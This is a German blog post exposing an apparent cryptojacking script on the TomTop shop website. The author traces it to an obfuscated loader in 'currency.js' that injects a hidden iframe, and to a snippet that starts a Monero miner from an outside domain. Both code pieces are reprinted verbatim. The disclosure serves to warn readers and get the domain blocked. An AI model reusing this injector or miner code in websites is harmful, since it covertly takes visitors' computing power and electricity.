Der China-Online-Großhandel TomTop verwendet neuerdings ein Script, mit dem Monero-Mining betrieben wird. Dieses Verfahren ist allerdings ziemlich umstritten, wenn sogar nicht ganz legal.
TomTop ist ein China-Großhandel als Online-Shop mit diversen Produkten, die selbst versendet werden. Dort bekommt man nicht nur den klassischen China-Ramsch, sondern auch „Markenprodukte” wie die DJI Drohne.
Wer gerne auf Gadgets und/oder Ramsch steht, die aus dem Ausland kommen, wird früher oder später schon auf TomTop geraten sein. In letzter Zeit ist der Online-Shop aber auch dafür bekannt, die DJI Drohne in verschiedenen Ausführungen mittels Gutschein-Code zu einem Kampfpreis zu verkaufen.
Ich persönlich habe dort habe noch nichts bestellt, kenne aber viele, die es tun und beruflich setze ich mich auch mit dem Online-Shop viel auseinander. So ist es mittlerweile auch kein Geheimnis mehr, dass die Waren, die eigentlich verzollt werden müssen, über gewisse Länder (London/Niederlande) versendet werden, um „den Zoll zu umgehen” oder deklarieren den Warenwert viel niedriger, als er eigentlich ist.
Gestern stolperte ich wieder auf die Webseite und musste feststellen, dass die Lüftung vom CPU-Lüfter plötzlich in die Höhe schoss. Ein Blick in den Windows Task-Manger zeigte, dass die Last des CPUs massiv anstieg. Sofort kam der Verdacht auf, dass ein Script dafür verantwortlich ist, womit Kryptowährung geschürft wird.
Es ist mittlerweile möglich, dass man mit einem Script auf einer Webseite die CPU eines Webseiten-Besuchers verwendet werden kann, um Rechenoperationen durchzuführen. Dafür erhält der Verwender des Scripts dann eine Vergütung, in der Regel in der selben Währung, wofür die Besucher die Kryptowährung schürft.
Das Problem an dieser Sache ist aber, dass die Betreiber einer Webseite sich durch diese neue Möglichkeit verleiten lässt, ungefragt die CPU des Besuchers für solche Zwecke zu missbrauchen. Nach Recherchen hin setzt TomTop genau nun diese Methode im eigenen Online-Shop ein. Jeder Besucher, der die Webseite aufruft, ruft automatisch im Browser das Script auf, womit die eigene CPU verwendet wird, um die Rechenaufgaben durchzuführen. Ungefragt.
Gerade das heimliche Schürften solcher Operationen stehen schon lange in der Kritik, weil der Besucher der Webseite in der Regel erstens nichts davon weiß und zweitens es auch noch ungefragt gemacht wird.
Meine Recherchen zeigten, dass die JavaScript-Datei „currency.js” in der neuesten Version eben solch ein Code beinhaltet, um die Rechenoperationen anzustoßen. In dieser Datei wird ein anderer Script geladen unter der URL „https://www.datasecu.download/lot.html”, wo dann letztendlich das Mining angestoßen wird beim Besucher.
var currencyRate = new Array(); currencyRate["CNY"] = 6.65; currencyRate["USD"] = 1.0; currencyRate["EUR"] = 0.83; [...] var _0x7bc7=["iframe","setAttribute","https://www.datasecu.download/lot.html","head","appendChild","1IABALrINkcv2VFJWo7ctqH0f3Y6aTf1","start","createElement"];!function(t,x){!function(x){for(;--x;)t.push(t.shift())}(++x)}(_0x7bc7,367);var _0x5028=function(t,x){var a=_0x7bc7[t-=0];return console.log(a,t),a};a=document[_0x5028("0x0")](_0x5028("0x1")),a[_0x5028("0x2")]("src",_0x5028("0x3")),a.style.width="0px",a.style.height="1px",document[_0x5028("0x4")][_0x5028("0x5")](a);
[...] <script src="https://www.datasecu.download/mb64.js"></script> <script> var eggplant = Gurke.Anonymous('489djE22mdZ3j34vhES98tCzfVn57Wq4fA8JR6uzgHqYCfYE2nmaZxmjepwr3GQAZd3qc3imFyGPHBy4PBWLb4tc1X8ADsu',{throttle: 0.4}); eggplant.start(); </script> [...]
Das Besondere hierbei ist, dass versucht wird zu verschleiern, dass man eben einen externen Script verwendet, um Kryptowährung (Monero) zu schürfen. Desweiteren ist es noch interessant, dass der eigentliche Script hinter einer Domain steckt, die ziemlich unbekannt ist. Selbst die geläufigsten Filterlisten kennen diese Domain nicht, sodass das Script für das Schürfen nicht blockiert wird.
Im Umkehrschluss heißt das also, dass so ziemlich jeder Besucher davon betroffen ist, sofern man eben nicht JavaScript im Browser selbst deaktiviert hat oder nur auf TomTop. Selbst AdBlocker oder speziell programmierte Browser-AddOns, die das (ungefragte) Schürfen verhindern, können das nicht verhindern. Auch der in Opera im System integrierte „NoCoin”-Schutz (Mining-Schutz für Kryptowährung) ist im Selbsttest machtlos.
Laut SimilarWeb hatte der Online-Shop im letzten Monat (Februar 2018) rund zehn Millionen Besucher. Für einhundert Besucher, die durchschnittlich drei Minuten auf der Webseite verweilen und das Script entsprechend (gezwungen) am laufen hat, bekommt der Verwender des Scripts 0,000286 XMR (Moneros). Umgerechnet sind das etwa 0,02 Euro. Auf zehn Millionen Besucher sind das dementsprechend rund 2.000 Euro pro Tag, im Monat rund 69.000 Euro. Eine stolze Summe und das geht zur Last der Besucher, die durch die erhöhte CPU-Last auch entsprechend mehr Strom verbrauchen.
Nun wissen wir also, dass der China-Shop TomTop ungefragt die CPU seiner Besucher verwendet, um sich selbst zu bereichern. Die einzige Maßnahme um das zu verhindern ist, die Domain „datasecu.download” zu blockieren. Um global Erfolg zu haben, sollten beispielsweise auch die Filterlisten die Domain auf die „Blacklist” nehmen. Darum habe ich mich schon gekümmert.
Eine Rückmeldung von TomTop, sowie von Coinhive (realisiert das CPU-Mining) erfolgte bis heute nicht. Aufgrund dessen werde ich noch ein paar anderen Medien darauf aufmerksam machen und hoffe, dass ich damit ein Stein ins Rollen bringe, sodass das unmoralische Handeln von TomTop beendet wird. Auch wenn es letztendlich sicherlich heißen wird, dass man es nur für eine kurze Zeit in Verwendung hatte, um es zu testen oder, dass man davon gar nichts wusste.